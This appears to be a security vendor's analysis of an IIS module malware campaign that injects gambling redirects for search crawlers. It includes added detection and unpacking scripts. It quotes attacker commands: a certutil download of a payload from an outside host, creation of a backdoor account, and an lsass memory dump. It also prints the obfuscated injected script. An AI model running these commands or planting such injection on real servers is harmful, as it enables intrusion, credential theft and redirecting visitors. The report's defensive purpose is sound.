- AhnLab Security Intelligence Center (ASEC) confirmed the distribution of malware that induces connections to illegal gambling advertising sites, targeting domestic web servers.
- The attacker infiltrated a poorly managed domestic Windows IIS (Internet Information Services) web server, installed a Meterpreter backdoor, a port forwarding tool and an IIS module malware tool, and stole the server’s credentials with ProcDump.
- IIS modules are extensions that support web server functions such as authentication, HTTP responses, and logging. Modules can be developed using the IIS C++ API or the ASP.NET 2.0 API.
- The discovered IIS module malware is designed to…
AhnLab Security Intelligence Center (ASEC) confirmed the distribution of malware that induces connections to illegal gambling advertising sites, targeting domestic web servers. After first infiltrating an improperly managed domestic Windows Internet Information Services (IIS) web server, the attacker installed a Meterpreter backdoor, a port forwarding tool and an IIS module malware tool, and stole the server’s credentials using ProcDump. An IIS module is a component that extends web server functions such as authentication, HTTP responses, and logging. Modules can be developed using the IIS C++ API or the ASP.NET 2.0 API.
The IIS module malware identified this time inspects the HTTP headers of requests to the web server on which it is installed and, under certain conditions, returns a modified response so that illegal gambling site advertisements are exposed on domestic and Chinese search portal sites. When a user clicks on such a link, the script redirects them to an illegal gambling site.
1. Meterpreter backdoor
The attacker ran several legitimate utilities such as ipconfig and systeminfo before installing the Meterpreter backdoor on the web server. This appears to have been done to collect information about the target before installing the IIS module malware. [Table 1] below shows the commands used by the attacker in timeline order.

| Command execution time | CMD run command |
|---|---|
| 2024.04.09 03:43:12 | ipconfig |
| 2024.04.09 03:45:32 | systeminfo |
| 2024.04.09 03:45:49 | whoami |
| 2024.04.09 03:56:20 | powershell whoami |
| 2024.04.09 04:17:13 | hostname |
| 2024.04.09 04:17:21 | net1 user |
| 2024.04.09 04:17:42 | query user |
| 2024.04.09 04:22:10 | ping 45.154.12.215 |
| 2024.04.09 04:23:18 | curl |
| 2024.04.09 04:23:56 | certutil |
| 2024.04.09 04:28:20 | certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt |
| 2024.04.09 04:32:20 | %ALLUSERSPROFILE%\xx.txt |

[Table 1] Commands used by attacker (1)
The Meterpreter backdoor takes the attacker’s IP address and port number as arguments when it is executed. Analysis of the backdoor code suggests that it connected to that address, received shellcode from the attacker’s server, and executed it.
2. HTran (port forwarding tool)
After installing the Meterpreter backdoor, the attacker additionally installed the HTran utility through the w3wp.exe process. HTran is a port forwarding tool whose source code is available on GitHub. Port forwarding relays data received on a specific port to another port. Its use varies by attacker, but in most cases where HTran is observed it is used to relay remote connections to the RDP port.
After installing the Meterpreter backdoor and the HTran port forwarding tool, the attacker created an account of their own with the net command to maintain persistence and secure a foothold on the target system. With this account, the attacker can easily reach the web server from the outside even without the web server’s original credentials.

| Command execution time | CMD run command (add account) |
|---|---|
| 2024.04.09 05:04:51 | net user kr$ test123!@# /add |

[Table 2] Commands used by attackers (2)
Less than two hours passed between initial access to the target and the point where the attacker had a foothold and persistence on the web server. The attacker installed the IIS module malware after establishing persistence.
3. IIS module malware
Generally, IIS modules exist as DLLs under C:\Windows\System32\inetsrv and are loaded and run inside w3wp.exe, the IIS worker process. For a module to be loaded into w3wp.exe, it must be written against the IIS C++ API and export a RegisterModule function. When the module runs, information about the HTTP request received by the IIS web server is delivered to the event handlers registered in RegisterModule, and each handler can process the request’s HTTP headers. The discovered malware placed its malicious code in the OnSendResponse handler, so that the malicious handler (sub_7FFB3DB7E840) executes whenever the IIS web server raises a SendResponse event.
OnSendResponse
-> Represents the method that will handle a SendResponse event, which occurs when IIS sends the response buffer.
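Because a native module only has to be registered in the globalModules list of applicationHost.config to be loaded into every w3wp.exe, the first thing a defender wants is a comparison of that list against a known-good baseline. The script below is an added example, not code from the ASEC post; the configuration fragment, the baseline set and the module names HttpResponseHelper and CacheHelper are constructed for the demonstration. On a real server the list lives in %windir%\System32\inetsrv\config\applicationHost.config (appcmd list modules prints the same information).

```python
# Added example (not part of the ASEC post): audit the IIS globalModules list
# against a baseline so an extra native module DLL stands out.
import xml.etree.ElementTree as ET

# Constructed applicationHost.config fragment. The first two entries mimic stock
# modules; HttpResponseHelper (a hypothetical DLL dropped into inetsrv) and
# CacheHelper (a hypothetical DLL outside inetsrv) are the cases to catch.
SAMPLE_CONFIG = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="HttpResponseHelper" image="%windir%\System32\inetsrv\rsphlp.dll" />
      <add name="CacheHelper" image="C:\ProgramData\cachehlp.dll" />
    </globalModules>
  </system.webServer>
</configuration>
"""

# Constructed baseline: module names exported from a clean reference server.
BASELINE_MODULES = {"HttpLoggingModule", "StaticFileModule"}

# Both spellings of the module directory as they appear in real configs.
INETSRV_PREFIXES = ("%windir%\\system32\\inetsrv\\", "c:\\windows\\system32\\inetsrv\\")


def _norm(path):
    """Lower-case and backslash-normalise a Windows path for prefix checks."""
    return path.strip().lower().replace("/", "\\")


def parse_global_modules(xml_text):
    """Return [(name, image)] for every <add> under <globalModules>."""
    root = ET.fromstring(xml_text)
    modules = []
    for gm in root.iter("globalModules"):
        for add in gm.findall("add"):
            modules.append((add.get("name", ""), add.get("image", "")))
    return modules


def audit_modules(xml_text, baseline=BASELINE_MODULES):
    """Flag modules that are not in the baseline or whose DLL lives outside inetsrv."""
    findings = []
    for name, image in parse_global_modules(xml_text):
        reasons = []
        if name not in baseline:
            reasons.append("module name not in baseline")
        if not _norm(image).startswith(INETSRV_PREFIXES):
            reasons.append("image outside %windir%\\System32\\inetsrv")
        if reasons:
            findings.append({"name": name, "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_modules(SAMPLE_CONFIG):
        print(f"{f['name']}: {f['image']} -> {', '.join(f['reasons'])}")
```

A module that sits in inetsrv under a plausible name passes the path check and is caught only by the baseline comparison, which is why the baseline must come from a server you trust. Every flagged DLL should then be hashed and compared with the IoCs at the end of this post and have its Authenticode signature checked (Get-AuthenticodeSignature in PowerShell).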
The installed malware manipulates the response to HTTP requests received by the web server. It determines how the visitor reached the page from the User-Agent, Referer, and other values in the received HTTP header, and if they contain a string associated with a specific search portal site, the response to the request is not the normal web page but a page related to illegal online gambling.
When searching for information about compromised domestic websites on a portal search site, pages related to illegal online gambling are exposed, as shown in [Figure 7] below.
For a website to appear on search portal sites, the web server must be exposed to search engines. When a search engine accesses a web page to collect information, the search engine’s HTTP header information is transmitted to the web server, and if the header value matches a specific keyword, the malware determines that a search engine is requesting access and transmits the Title, Keyword, and Description meta tag information of an illegal online gambling page to the search engine.
As a result, pages related to illegal online gambling are exposed even when searching for normal sites on portal sites. The search engine check and the other main functions identified in the malware are described below.
[1] If a specific keyword matches, send a script response that connects to “hxxps://ll.olacityviet.com/av.js”
Check whether the User-Agent header contains one of the keywords below
– naver|sogou|360|yisou|daum|google|coccoc
Check whether the Referer header contains one of the keywords below
– naver.com|so.com|sogou.com|sm.cn|daum.net|google|coccoc
[2] Steal cookie information from the HTTP header
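Since the module answers differently depending on who appears to be asking, the practical check for a site owner is to request the same page with a plain browser header set and with the crawler User-Agent and portal Referer values listed above, then diff the responses. The code below is an added example, not part of the ASEC post; the fetch function is injected so the check runs offline, and fake_fetch is a constructed stand-in that behaves like the keyword logic described above (the injected script URL injected.example.invalid and the crawler User-Agent strings are made up for the test).

```python
# Added example (not part of the ASEC post): probe a page with the header values
# the malware keys on and report what appears only in the "search engine" replies.
import re
import urllib.request

BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"

# Header probes: a plain browser request (baseline) plus requests carrying the
# portal keywords from the post. The crawler UA strings are constructed.
PROBES = {
    "baseline": {"User-Agent": BROWSER_UA},
    "ua:naver": {"User-Agent": "Mozilla/5.0 (compatible; naver-crawler-test)"},
    "ua:sogou": {"User-Agent": "sogou-spider-test/1.0"},
    "ref:daum": {"User-Agent": BROWSER_UA, "Referer": "https://search.daum.net/search?q=test"},
    "ref:google": {"User-Agent": BROWSER_UA, "Referer": "https://www.google.com/"},
}

SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.I)


def real_fetch(url, headers, timeout=10):
    """Plain urllib fetch, for running the check against your own server."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def _normalize(html):
    return re.sub(r"\s+", " ", html).strip()


def detect_cloaking(fetch, url, probes=PROBES):
    """Return {probe_name: [script src values seen only under that probe]}
    for every probe whose response body differs from the baseline response."""
    base = fetch(url, probes["baseline"])
    base_srcs = set(SCRIPT_SRC.findall(base))
    findings = {}
    for name, headers in probes.items():
        if name == "baseline":
            continue
        body = fetch(url, headers)
        if _normalize(body) != _normalize(base):
            findings[name] = sorted(set(SCRIPT_SRC.findall(body)) - base_srcs)
    return findings


# --- constructed simulation of an infected server, for offline testing -------
NORMAL_PAGE = "<html><head><title>Shop</title></head><body>Welcome</body></html>"
INJECTED_TAG = '<script src="https://injected.example.invalid/av.js"></script>'
UA_KEYWORDS = ("naver", "sogou", "360", "yisou", "daum", "google", "coccoc")
REF_KEYWORDS = ("naver.com", "so.com", "sogou.com", "sm.cn", "daum.net", "google", "coccoc")


def fake_fetch(url, headers):
    """Mimics the module: inject a script tag when UA or Referer matches a keyword."""
    ua = headers.get("User-Agent", "").lower()
    ref = headers.get("Referer", "").lower()
    if any(k in ua for k in UA_KEYWORDS) or any(k in ref for k in REF_KEYWORDS):
        return NORMAL_PAGE.replace("</body>", INJECTED_TAG + "</body>")
    return NORMAL_PAGE


if __name__ == "__main__":
    for probe, extra in detect_cloaking(fake_fetch, "http://example.invalid/").items():
        print(probe, "->", extra)
```

Run it with real_fetch against a server you operate and an empty result means every probe got the same page; any non-empty entry lists the script sources that only the "search engine" requests received, which is exactly the av.js injection described in the post. Because the module matches on substrings, a normal browser UA that happens to contain one of the keywords would also trigger it, so keep the baseline UA free of them.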
The obfuscated script below is the response returned for HTTP access; the malware inserts it into the normal response. It redirects users to the address of an illegal online gambling site.
```html
<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
e = function(c) {
return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function(e) {
return r[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--)
if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ll.olacityviet|com|av|js|split'.split('|'), 0, {})) </script>
```
The decoded script is as follows.
```javascript
document.write('<script src="hxxps://ll.olacityviet.com/av[.]js"></script>');
```
At present the script only leads to a page related to illegal online gambling, but since the remote response script can be changed at any time, other malicious actions could be carried out through it, so particular caution is required.
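The script above is packed twice with the common eval(function(p,a,c,k,e,r){...}) packer, and the usual way to read it is to re-implement the decoder rather than run the attacker's eval. The Python below is an added example, not code from the ASEC post: it parses the packer's argument list, rebuilds the word table the same way the packer's e() function does (base-a digits, with values above 35 written as A, B, C, ...), substitutes the words, and repeats until no packer call is left. PACKED_LINE is the argument line of the script above copied verbatim; the intermediate and final strings it produces come from that line alone.

```python
# Added example (not part of the ASEC post): static unpacker for the
# eval(function(p,a,c,k,e,r){...})(p, a, c, k.split('|'), 0, {}) packer.
import re

# The final line of the packed script from the post (only the packer call
# with its arguments is needed; the decoder function above it is standard).
PACKED_LINE = r"""}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ll.olacityviet|com|av|js|split'.split('|'), 0, {})) </script>"""

# Matches ...}('<p>', a, c, '<k>'.split('|'), 0, {})) and captures p, a, c, k.
PACKER_ARGS = re.compile(
    r"\}\('(.*)',\s*(\d+),\s*(\d+),\s*'(.*)'\.split\('\|'\),\s*\d+,\s*\{\}\)\)")

DIGITS36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def _unescape(js_literal):
    """Undo JS single-quoted-string escaping: \\' -> ' and \\\\ -> \\."""
    return re.sub(r"\\(.)", r"\1", js_literal)


def _encode(n, a):
    """Mirror of the packer's e(): base-a digits, digits above 35 as A, B, C..."""
    head = "" if n < a else _encode(n // a, a)
    n %= a
    return head + (chr(n + 29) if n > 35 else DIGITS36[n])


def unpack_once(p, a, c, k):
    """Replace every word token in p with its dictionary entry (if it has one)."""
    table = {}
    for i in range(c):
        key = _encode(i, a)
        table[key] = k[i] if i < len(k) and k[i] else key
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p)


def unpack_all(src, max_rounds=10):
    """Unpack nested packer layers until no packer call remains."""
    for _ in range(max_rounds):
        m = PACKER_ARGS.search(src)
        if not m:
            return src
        p, a, c, k = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)
        src = unpack_once(_unescape(p), a, c, k.split("|"))
    return src


if __name__ == "__main__":
    print(unpack_all(PACKED_LINE))
```

The first round turns the 44-entry dictionary back into a second packer call with a 13-entry dictionary; the second round yields window["document"]["write"]('<script type="text/javascript" src="https://ll.olacityviet.com/av.js"></script>');, which is the document.write call shown above with the property accesses written out. The word-boundary substitution is done in a single pass, as in the packer, so a decoded word is never re-substituted.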
4. Circumstances of ProcDump abuse
After installing the IIS module malware, the attacker used ProcDump to dump the memory of the lsass.exe process on the web server. This is a credential theft technique comparable to Mimikatz, and it is presumed to have been used for lateral movement to other servers connected to the web server.

| Command execution time | CMD run command |
|---|---|
| 2024.04.10 00:20:44 | %ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip |

[Table 3] Commands used by attacker (3)
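Tables 1 to 3 together give a detection opportunity that does not depend on the module DLL at all: every command was spawned by the IIS worker process, and the sequence (reconnaissance, certutil download, local account creation, lsass dump) is the same from initial access to credential theft. The script below is an added example, not part of the ASEC post; it runs rules over a constructed process-creation timeline built from the three tables (the "timestamp | parent process | command line" layout is an assumption about the log source).

```python
# Added example (not part of the ASEC post): flag the command-line patterns from
# Tables 1-3 when they are launched by the IIS worker process, and check whether
# the whole chain occurred in order.
import re
from datetime import datetime

# Constructed timeline: the commands from Tables 1-3 with w3wp.exe as parent,
# plus one benign line from an interactive session as a negative case.
SAMPLE_LOG = """\
2024.04.09 03:43:12 | w3wp.exe | ipconfig
2024.04.09 03:45:32 | w3wp.exe | systeminfo
2024.04.09 03:45:49 | w3wp.exe | whoami
2024.04.09 04:17:21 | w3wp.exe | net1 user
2024.04.09 04:28:20 | w3wp.exe | certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt
2024.04.09 05:04:51 | w3wp.exe | net user kr$ test123!@# /add
2024.04.10 00:20:44 | w3wp.exe | %ALLUSERSPROFILE%\\p.exe -accepteula -ma lsass.exe C:\\ProgramData\\xxx.zip
2024.04.10 09:00:00 | explorer.exe | systeminfo
"""

# Each rule is (tag, regex over the command line). Tags feed the chain check.
RULES = [
    ("recon", re.compile(r"^(ipconfig|systeminfo|whoami|hostname|query\s+user|net1?\s+user)\b", re.I)),
    ("certutil_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("account_added", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("lsass_dump", re.compile(r"-ma\s+lsass(\.exe)?\b", re.I)),
]
WEB_WORKERS = {"w3wp.exe"}
CHAIN = ["recon", "certutil_download", "account_added", "lsass_dump"]
TS_FORMAT = "%Y.%m.%d %H:%M:%S"


def parse_log(text):
    """Parse 'timestamp | parent | command' lines into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, cmd = (part.strip() for part in line.split("|", 2))
        events.append({"ts": datetime.strptime(ts, TS_FORMAT), "parent": parent, "cmd": cmd})
    return events


def classify(events):
    """Keep only events spawned by a web worker that match at least one rule."""
    findings = []
    for ev in events:
        tags = [tag for tag, rx in RULES if rx.search(ev["cmd"])]
        if tags and ev["parent"].lower() in WEB_WORKERS:
            findings.append({**ev, "tags": tags})
    return findings


def chain_detected(findings, stages=CHAIN):
    """True when every stage was seen and their first occurrences are in order."""
    first_seen = {}
    for f in findings:
        for tag in f["tags"]:
            first_seen.setdefault(tag, f["ts"])
    times = [first_seen.get(s) for s in stages]
    return all(t is not None for t in times) and times == sorted(times)


if __name__ == "__main__":
    hits = classify(parse_log(SAMPLE_LOG))
    for h in hits:
        print(h["ts"], h["parent"], ",".join(h["tags"]), "|", h["cmd"])
    print("full chain:", chain_detected(hits))
```

On its own, a single systeminfo is noise, which is why the parent-process condition carries most of the weight: w3wp.exe has no business launching shell utilities, and the certutil and lsass rules are high-confidence even without the chain. The ordered chain check turns the individual hits into the timeline the post reconstructs in Tables 1 to 3.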
5. Conclusion
The attacker first infiltrated an improperly managed Windows web server and later obtained credentials to secure a foothold, maintain persistence, achieve their goals, and move laterally. Search engines such as Shodan and FOFA make it easy to look up the IP address, open ports, running services, and operating system of devices connected to the Internet anywhere in the world, and attackers are assumed to use them to find targets. Corporate security personnel should therefore identify assets that may be exposed to attackers through attack surface management and keep security patches up to date.
File Diagnostic
Meterpreter Backdoor
– Trojan/Win.Meterpreter.C644410 (2024.04.09.02)
IIS module malware (x64)
– Trojan/Win.Generic.C5408521 (2023.04.10.02)
IIS module malware (x86)
– Trojan/Win.Backdoor.C578523 (2023.01.18.03)
IoC
MD5
meterpreter backdoor
– d5312ab7f01fd74d399c392effdfe437
IIS module malware (x64)
– ebeb931a6dd91a227225f0ff92142f2b
IIS module malware (x86)
– 28dd72e322f6be382dac4fa9eb5cd09b
C&C Address
Meterpreter Backdoor C&C Address
– 43.156.50[.]76
Address related to online illegal gambling connection
– hxxp://ll.olacityviet[.]com
– hxxp://jsc.olacityviet[.]com
– hxxps://ll.olacityviet[.]com/av.js